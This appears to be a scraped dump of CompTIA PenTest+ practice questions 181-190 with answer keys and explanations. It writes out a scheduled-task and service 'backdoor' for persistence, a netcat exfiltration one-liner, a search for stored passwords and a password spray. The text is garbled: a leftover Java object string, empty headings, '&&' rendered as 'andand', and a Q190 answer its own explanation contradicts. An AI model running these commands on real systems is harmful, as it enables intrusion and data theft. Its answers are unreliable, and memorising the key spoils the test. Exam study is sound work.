CompTIA CompTIA Certifications PT0-003 Questions & Answers

• Question 181:

  During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result. Which of the following is the best tool to use for this task?

  A. Nikto

  B. Burp Suite

  C. smbclient

  D. theHarvester

  Correct Answer: C

  The smbclient tool is used to access SMB/CIFS resources on a network. It allows penetration testers to connect to shared resources and enumerate users on a network, particularly in Windows environments. While finger and rwho are more

  common on Unix/Linux systems, smbclient provides better functionality for enumerating users across a network.

  Understanding smbclient:

  User Enumeration:

  Step-by-Step Explanationsmbclient -L //target_ip -U username uk.co.certification.simulator.questionpool.PList@54a8847b smbclient -L //192.168.50.2 -U anonymous Advantages:

  References from Pentesting Literature:

  References:

  Penetration Testing - A Hands-on Introduction to Hacking HTB Official Writeups

• Question 182:

  A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

  A. schtasks.exe

  B. rundll.exe

  C. cmd.exe

  D. chgusr.exe

  E. sc.exe

  F. netsh.exe

  Correct Answer: AE

  To reenter the system remotely after the patch for the recently exploited RCE vulnerability has been deployed, the penetration tester can use schtasks.exe and sc.exe.

  schtasks.exe:

  schtasks /create /tn "Backdoor" /tr "C:\path\to\backdoor.exe" /sc daily /ru SYSTEM sc.exe:

  sc create backdoor binPath= "C:\path\to\backdoor.exe" start= auto Other Utilities:

  Pentest References:

  Post-Exploitation: Establishing persistence is crucial to maintaining access after initial exploitation.

  Windows Tools: Understanding how to leverage built-in Windows tools like schtasks.exe and sc.exe to create backdoors that persist through reboots and patches. By using schtasks.exe and sc.exe, the penetration tester can set up persistent

  mechanisms that will allow reentry into the system even after the patch is applied.

• Question 183:

  During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command: findstr /SIM /C:"pass" *.txt *.cfg *.xml

  Which of the following is the penetration tester trying to enumerate?

  A. Configuration files

  B. Permissions

  C. Virtual hosts

  D. Secrets

  Correct Answer: D

  By running the command findstr /SIM /C:"pass" *.txt *.cfg *.xml, the penetration tester is trying to enumerate secrets.

  Command Analysis:

  Objective:

  Other Options:

  Pentest References:

  Post-Exploitation: Enumerating sensitive information like passwords is a common post-exploitation activity after gaining initial access. Credential Discovery: Searching for stored credentials within configuration files and documents to escalate

  privileges or move laterally within the network. By running this command, the penetration tester aims to find stored passwords or other secrets that could help in further exploitation of the target system.

• Question 184:

  A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:

  Action | SRC

  | DEST

  | -

  Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCP

  Allow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24:443 | TCP

  Allow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0:443 | TCP Block | . | . | *

  Which of the following commands should the tester try next?

  A. tar -zcvf /tmp/data.tar.gz /path/to/data andand nc -w 3 443 < /tmp/data.tar.gz

  B. gzip /path/to/data andand cp data.gz 443

  C. gzip /path/to/data andand nc -nvlk 443; cat data.gz ' nc -w 3 22

  D. tar -zcvf /tmp/data.tar.gz /path/to/data andand scp /tmp/data.tar.gz

  Correct Answer: A

  Given the firewall policy, let's analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic. The firewall policy rules are:

  Block: Any traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP). Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP). Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).

  Block: All other traffic (*).

  Breakdown of Options:

  Option A: tar -zcvf /tmp/data.tar.gz /path/to/data andand nc -w 3 443 < /tmp/data.tar.gz

  Option B: gzip /path/to/data andand cp data.gz 443 Option C: gzip /path/to/data andand nc -nvlk 443; cat data.gz | nc -w 3 22 Option D: tar -zcvf /tmp/data.tar.gz /path/to/data andand scp /tmp/data.tar.gz

  References from Pentest:

  Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A. Forge HTB:

  This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc. Horizontall HTB: Highlights the

  importance of using allowed services and ports for data exfiltration. The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.

• Question 185:

  Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

  A. Preserving artifacts

  B. Reverting configuration changes

  C. Keeping chain of custody

  D. Exporting credential data

  Correct Answer: A

  Preserving artifacts ensures that key outputs from the penetration test, such as logs, screenshots, captured data, and any generated reports, are retained for analysis, reporting, and future reference.

  Importance of Preserving Artifacts:

  Types of Artifacts:

  Best Practices:

  References from Pentesting Literature:

  Step-by-Step ExplanationReferences:

  Penetration Testing - A Hands-on Introduction to Hacking HTB Official Writeups

• Question 186:

  While performing an internal assessment, a tester uses the following command:

  crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@

  Which of the following is the main purpose of the command?

  A. To perform a pass-the-hash attack over multiple endpoints within the internal network

  B. To perform common protocol scanning within the internal network

  C. To perform password spraying on internal systems

  D. To execute a command in multiple endpoints at the same time

  Correct Answer: C

  The command crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@ is used to perform password spraying on internal systems. CrackMapExec (CME) is a post- exploitation tool that helps automate the process of assessing large

  Active Directory networks. It supports multiple protocols, including SMB, and can perform various actions like password spraying, command execution, and more.

  CrackMapExec:

  Command Breakdown:

  Password Spraying:

  Pentest References:

  Password Spraying: An effective method for gaining initial access during penetration tests, particularly against organizations that have weak password policies or commonly used passwords. CrackMapExec: Widely used in penetration testing

  for its ability to automate and streamline the process of credential validation and exploitation across large networks. By using the specified command, the tester performs a password spraying attack, attempting to log in with a common

  password across multiple usernames, identifying potential weak accounts.

• Question 187:

  A penetration tester is conducting a wireless security assessment for a client with 2.4GHz and 5GHz access points. The tester places a wireless USB dongle in the laptop to start capturing WPA2 handshakes. Which of the following steps should the tester take next?

  A. Enable monitoring mode using Aircrack-ng.

  B. Use Kismet to automatically place the wireless dongle in monitor mode and collect handshakes.

  C. Run KARMA to break the password.

  D. Research WiGLE.net for potential nearby client access points.

  Correct Answer: A

  Monitoring Mode:

  Aircrack-ng Suite:

  airmon-ng start wlan0

  This command starts the interface wlan0 in monitoring mode.

  Steps to Capture WPA2 Handshakes:

  airodump-ng wlan0mon

  Pentest References:

  Wireless Security Assessments: Understanding the importance of monitoring mode for capturing data during wireless penetration tests. Aircrack-ng Tools: Utilizing the suite effectively for tasks like capturing WPA2 handshakes, deauthenticating clients, and cracking passwords. By enabling monitoring mode with Aircrack-ng, the tester can capture the necessary WPA2 handshakes to further analyze and attempt to crack the Wi-Fi network's password.

• Question 188:

  During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?

  A. On-path

  B. Logic bomb

  C. Rootkit

  D. Buffer overflow

  Correct Answer: C

  A rootkit is a type of malicious software designed to provide an attacker with unauthorized access to a computer system while concealing its presence. Rootkits achieve this by modifying the host's operating system or other software to hide

  their existence, allowing the attacker to maintain control over the system without detection.

  Definition and Purpose:

  Mechanisms of Action:

  Detection and Prevention:

  Real-World Examples:

  References from Pentesting Literature:

  Step-by-Step ExplanationReferences:

  Penetration Testing - A Hands-on Introduction to Hacking HTB Official Writeups on sophisticated attacks

• Question 189:

  A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?

  A. OWASP MASVS

  B. OSSTMM

  C. MITRE ATTandCK

  D. CREST

  Correct Answer: B

  The OSSTMM (Open Source Security Testing Methodology Manual) is a comprehensive framework for security testing that includes 14 components in its life cycle. Here's why option B is correct:

  OSSTMM: This methodology breaks down the security testing process into 14 components, covering various aspects of security assessment, from planning to execution and reporting.

  OWASP MASVS: This is a framework for mobile application security verification and does not have a 14-component life cycle.

  MITRE ATTandCK: This is a knowledge base of adversary tactics and techniques but does not describe a 14-component life cycle.

  CREST: This is a certification body for penetration testers and security professionals but does not provide a specific 14-component framework.

  References from Pentest:

  Anubis HTB: Emphasizes the structured approach of OSSTMM in conducting comprehensive security assessments.

  Writeup HTB: Highlights the use of detailed methodologies like OSSTMM to cover all aspects of security testing.

  Conclusion:

  Option B, OSSTMM, is the framework that breaks the life cycle into 14 components, making it the correct answer.

• Question 190:

  A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?

  A. A generative AI assistant

  B. The customer's designated contact

  C. A cybersecurity industry peer

  D. A team member

  Correct Answer: B

  Before sharing a report with a client, it is crucial to have it reviewed to ensure accuracy, clarity, and completeness. The best choice for this review is a team member. Here's why:

  Internal Peer Review:

  Alternative Review Options:

  In summary, an internal team member is the most suitable choice for a thorough and contextually accurate review before sharing the report with the client.